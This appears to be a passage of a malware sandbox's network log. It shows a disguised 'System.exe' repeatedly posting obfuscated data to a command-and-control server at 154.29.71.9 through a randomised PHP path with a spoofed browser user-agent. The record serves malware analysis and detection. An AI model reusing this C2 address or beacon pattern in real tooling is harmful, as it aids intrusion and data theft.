                                                                                                    Jan 4, 2025 14:53:18.754450083 CET2600OUTData Raw: 5c 59 58 59 5e 5c 58 52 5b 59 5a 55 50 59 5b 56 56 55 54 49 52 5a 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \YXY^\XR[YZUPY[VVUTIRZR\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^,>>$+"?=?(08X/&Q5("8*4A&#$Y."Y ']/
                                                                                                    Jan 4, 2025 14:53:18.918397903 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:19.046211004 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:18 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    78192.168.2.449927154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:19.343435049 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:19.691951036 CET2600OUTData Raw: 5c 5a 58 5a 5b 5c 58 56 5b 59 5a 55 50 5d 5b 5b 56 52 54 44 52 59 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZXZ[\XV[YZUP][[VRTDRYRPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\98%(:)<+V3/83"-;6(>>(&8Y9"Y ']/0
                                                                                                    Jan 4, 2025 14:53:19.855638981 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:20.190565109 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    79192.168.2.449933154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:19.979089975 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:20.332509041 CET1876OUTData Raw: 59 5b 58 5a 5e 59 58 5d 5b 59 5a 55 50 5c 5b 5a 56 5d 54 43 52 5a 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y[XZ^YX][YZUP\[ZV]TCRZRQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,>%[%&U>+V$($Y.3%585*=>%4Y:"Y ']/4
                                                                                                    Jan 4, 2025 14:53:20.704212904 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:20.834212065 CET349INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:20 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 22 5b 26 2a 21 0f 26 2e 30 54 3a 05 3a 0a 28 30 3e 41 2e 2e 38 5b 3f 3a 3f 14 2f 55 2f 12 3e 06 21 1a 3e 31 3f 53 25 2f 01 00 28 0c 20 51 03 12 27 5e 32 07 04 59 3d 0a 25 14 2e 07 33 18 21 31 23 5b 27 3a 26 1f 20 2e 3e 04 31 2f 35 1d 2a 2f 2d 54 2c 3e 06 02 2e 0d 34 1f 3f 3f 23 55 0b 1f 26 0d 24 1f 20 50 26 38 30 59 3c 20 16 58 28 3a 06 0f 20 39 20 5d 25 3d 2e 1d 33 0f 36 0d 33 31 32 07 30 33 26 05 23 2d 3b 59 25 10 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98"[&*!&.0T::(0>A..8[?:?/U/>!>1?S%/( Q'^2Y=%.3!1#[':& .>1/5*/-T,>.4??#U&$ P&80Y< X(: 9 ]%=.3631203&#-;Y%.S.-W=YL0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    80192.168.2.449934154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:20.191997051 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:20.551414967 CET2600OUTData Raw: 59 5c 5d 5d 5e 5f 5d 57 5b 59 5a 55 50 5f 5b 50 56 5c 54 47 52 5f 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\]]^_]W[YZUP_[PV\TGR_R_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9/&**-3+;W3?; 150"^:)- C%3Z:"Y ']/
                                                                                                    Jan 4, 2025 14:53:20.727958918 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:20.862485886 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:20 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    81192.168.2.449940154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:20.993215084 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:21.348145962 CET2600OUTData Raw: 59 50 5d 5b 5b 5e 58 53 5b 59 5a 55 50 59 5b 5a 56 54 54 43 52 59 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YP][[^XS[YZUPY[ZVTTCRYRPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^..)1->#+T3;/Q!-'V5^!*#&8Y."Y ']/
                                                                                                    Jan 4, 2025 14:53:21.520750046 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:21.651735067 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:21 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    82192.168.2.449946154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:22.172946930 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:22.520030975 CET2600OUTData Raw: 5c 5e 58 5d 5b 55 58 57 5b 59 5a 55 50 5d 5b 56 56 56 54 49 52 5e 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \^X][UXW[YZUP][VVVTIR^RYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:;>9^&(.Q=- ^+-$88^/1 =("8"=>13-"Y ']/0
                                                                                                    Jan 4, 2025 14:53:22.842766047 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:22.976479053 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:22 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    83192.168.2.449952154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:23.101006985 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:23.457674026 CET2600OUTData Raw: 59 50 58 58 5e 5c 5d 54 5b 59 5a 55 50 5b 5b 57 56 5c 54 47 52 5d 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YPXX^\]T[YZUP[[WV\TGR]RPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:;-![%^9>[;(>('8<83)"!;:>X(& ;."Y ']/(
                                                                                                    Jan 4, 2025 14:53:23.673592091 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:23.807831049 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:23 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    84192.168.2.449958154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:23.961766958 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:24.317012072 CET2600OUTData Raw: 59 5c 58 58 5b 5c 5d 50 5b 59 5a 55 50 5c 5b 5a 56 54 54 45 52 58 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\XX[\]P[YZUP\[ZVTTERXRPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Y;%-?-;([(3^.3)"=0!(>=<C%#,9"Y ']/4
                                                                                                    Jan 4, 2025 14:53:24.489202023 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:24.624222994 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:24 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    85192.168.2.449964154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:25.029465914 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:25.380672932 CET2600OUTData Raw: 5c 5a 58 50 5e 59 5d 50 5b 59 5a 55 50 5b 5b 50 56 51 54 49 52 59 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZXP^Y]P[YZUP[[PVQTIRYRYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9.-=X$;==-+<-+$]3,3Q"=;P!(P)>?&7:"Y ']/(
                                                                                                    Jan 4, 2025 14:53:25.565445900 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:25.697849035 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:25 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    86192.168.2.449970154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:25.834310055 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:26.191931009 CET2600OUTData Raw: 5c 5d 58 5b 5b 54 5d 54 5b 59 5a 55 50 5d 5b 53 56 52 54 44 52 5e 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \]X[[T]T[YZUP][SVRTDR^RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Y8>-[2;1?-3+3U'] /0."-<"+"*;2<]:?"Y ']/0
                                                                                                    Jan 4, 2025 14:53:26.351118088 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:26.478104115 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:26 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    87192.168.2.449971154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:25.854712963 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:26.209472895 CET1876OUTData Raw: 59 58 58 5f 5e 59 5d 50 5b 59 5a 55 50 51 5b 52 56 56 54 49 52 59 52 5e 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YXX_^Y]P[YZUPQ[RVVTIRYR^U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9;%&+:>-+[/R$;</15(#;)T>$E%3(.?"Y ']/
                                                                                                    Jan 4, 2025 14:53:26.371798992 CET25INHTTP/1.1 100 Continue


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    88192.168.2.449977154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:26.610944986 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:26.957564116 CET2600OUTData Raw: 59 5d 58 5e 5e 59 5d 50 5b 59 5a 55 50 5e 5b 53 56 57 54 48 52 5b 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y]X^^Y]P[YZUP^[SVWTHR[R_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:8>=2^:>+<3;. "W685;**#$ ;//"Y ']/<
                                                                                                    Jan 4, 2025 14:53:27.146038055 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:27.277930975 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:27 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    89192.168.2.449983154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:27.763329983 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:28.114315033 CET2600OUTData Raw: 59 5c 5d 58 5e 5e 58 53 5b 59 5a 55 50 5c 5b 5a 56 5c 54 42 52 59 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
